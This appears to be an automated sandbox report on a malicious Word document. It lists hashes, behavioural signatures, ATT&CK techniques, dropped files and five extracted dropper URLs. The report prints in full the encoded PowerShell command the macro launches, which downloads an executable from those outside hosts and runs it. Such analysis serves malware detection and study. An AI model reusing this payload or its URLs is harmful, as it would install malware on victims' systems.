7b18ff94d9843443828f7472ed3e4b7f3f2ccb36ef347622ec756c601a3e494c

General

Target

Dokumentenkopie-84150054-190221.doc
Size

277KB
MD5

582ee4846834a26ebc4fd15c845e5c85
SHA1

bb3bb4f1fb4930272c9b036716762d1c3b10ce20
SHA256

0a430c521e0b67b41fe962570eddc2f391c29bc0d9b688b2a35c834cd08a58ae
SHA512

9ac0ec1b3f50abad790cc88de42e20b72182849e02eaf0f28e63c3221029a89e2144daa33fff8358bfd49d4495fd7444a1ae87e5d257ff93345590e54f239f87
SSDEEP

6144:XG5/BnVfRFJ7KK9aHScdX9znGUhYNpuKCxx6djQ:X2n9R/lA5dX9znGUiNrdjQ

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://81.56.198.200/vzDYQ0vT

exe.dropper

http://sosh47.citycheb.ru/Epe9RyrbX

exe.dropper

http://thptngochoi.edu.vn/3X1Gc99SU

exe.dropper

http://fit-school.ru/zCBKJesoEs

exe.dropper

http://diaocthiennam.vn/tcD61klP

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	548	3800	powersheLl.exe	82

Blocklisted process makes network request 3 IoCs

flow	pid	Process
22	548	powersheLl.exe
62	548	powersheLl.exe
65	548	powersheLl.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1196	WINWORD.EXE
1196	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
548	powersheLl.exe
548	powersheLl.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	548	powersheLl.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1196	WINWORD.EXE
1196	WINWORD.EXE
1196	WINWORD.EXE
1196	WINWORD.EXE
1196	WINWORD.EXE
1196	WINWORD.EXE
1196	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Dokumentenkopie-84150054-190221.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1196

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe
powersheLl -e JABpADcAXwBfADkAXwA4AD0AKAAnAGoAMgBfADUAJwArACcANAAnACsAJwA0AF8AJwApADsAJABVAF8AXwBfADMAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AF8AMgBfADgAXwAyADAAPQAoACcAaAB0AHQAJwArACcAcAAnACsAJwA6AC8ALwA4ADEALgA1ADYALgAnACsAJwAxADkAOAAuADIAMAAwAC8AJwArACcAdgB6AEQAWQAnACsAJwBRADAAJwArACcAdgBUAEAAaAB0ACcAKwAnAHQAJwArACcAcAA6AC8ALwBzAG8AcwBoACcAKwAnADQANwAuAGMAJwArACcAaQAnACsAJwB0AHkAYwAnACsAJwBoACcAKwAnAGUAYgAuAHIAdQAvAEUAcAAnACsAJwBlADkAUgB5AHIAYgBYAEAAJwArACcAaAAnACsAJwB0AHQAcAA6AC8ALwB0AGgAcAB0ACcAKwAnAG4AZwBvAGMAaABvAGkALgBlACcAKwAnAGQAJwArACcAdQAuAHYAbgAvADMAWAAxAEcAYwA5ADkAJwArACcAUwBVAEAAaAB0AHQAcAAnACsAJwA6AC8ALwBmAGkAdAAtAHMAJwArACcAYwBoAG8AJwArACcAbwBsAC4AcgB1ACcAKwAnAC8AegBDAEIASwBKAGUAcwBvAEUAJwArACcAcwAnACsAJwBAAGgAdAB0AHAAOgAvAC8AZABpAGEAbwBjACcAKwAnAHQAaABpAGUAJwArACcAbgAnACsAJwBuAGEAbQAuAHYAbgAvAHQAJwArACcAYwBEACcAKwAnADYAJwArACcAMQBrAGwAUAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABqADEAMgBfAF8AXwBfADIAPQAoACcAVgAzACcAKwAnADcANgBfACcAKwAnAF8AXwAyACcAKQA7ACQAYgA0ADcAMwAyADkAIAA9ACAAKAAnADQAOAAnACsAJwAwACcAKQA7ACQAegA3ADYAMAA1ADkAXwAwAD0AKAAnAGMAJwArACcANQAzAF8AOAAnACsAJwA2AF8AMAAnACkAOwAkAHoAXwA5ADUAXwBfAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADQANwAzADIAOQArACgAJwAuAGUAeAAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFIAOQAxADgANwA4ADkANAAgAGkAbgAgACQAegBfADIAXwA4AF8AMgAwACkAewB0AHIAeQB7ACQAVQBfAF8AXwAzADIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAUgA5ADEAOAA3ADgAOQA0ACwAIAAkAHoAXwA5ADUAXwBfACkAOwAkAGMAXwBfAF8ANwAzADAAXwA9ACgAJwBIADcAJwArACcANgA0ADAAOAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJAB6AF8AOQA1AF8AXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAHoAXwA5ADUAXwBfADsAJABiADMAMQA2AF8AXwA9ACgAJwBRADcANwA4ADMAJwArACcANwA3ADYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAG4AOAA0ADIAXwAyAD0AKAAnAHMAMgAnACsAJwBfAF8AJwArACcANABfACcAKQA7AA==
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDE132.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5bwkuqs.ejq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
2KB

MD5
8910f30cb96bdbf77b263c96edb3b4e2

SHA1
d3683457823647f3f697fe165f8dadc361f1c5cd

SHA256
2f5f2b7d5b3d92b0573ac487848b0a8417efd9c6ed8d12b9796032d3eadcd650

SHA512
15d5a781b17fb322eeb3bf22f8dd92d25c671f2da2e52dea86f4e2a47cfdc2f11b57df0c8bada16b955f3f84667d19ce2f4e7affb37914416dc7bc8df98d0bba

Download Submit
memory/548-34-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/548-181-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/548-61-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/548-40-0x0000014C28AB0000-0x0000014C28AD2000-memory.dmp

Filesize
136KB

Download
memory/1196-15-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-13-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-1-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-16-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-17-0x00007FFD525B0000-0x00007FFD525C0000-memory.dmp

Filesize
64KB

Download
memory/1196-11-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-9-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-8-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-7-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-6-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-5-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-18-0x00007FFD525B0000-0x00007FFD525C0000-memory.dmp

Filesize
64KB

Download
memory/1196-28-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-30-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-12-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-14-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-10-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-50-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-51-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-53-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download
memory/1196-0-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-4-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-3-0x00007FFD9478D000-0x00007FFD9478E000-memory.dmp

Filesize
4KB

Download
memory/1196-2-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-202-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-201-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-204-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-203-0x00007FFD54770000-0x00007FFD54780000-memory.dmp

Filesize
64KB

Download
memory/1196-205-0x00007FFD946F0000-0x00007FFD948E5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads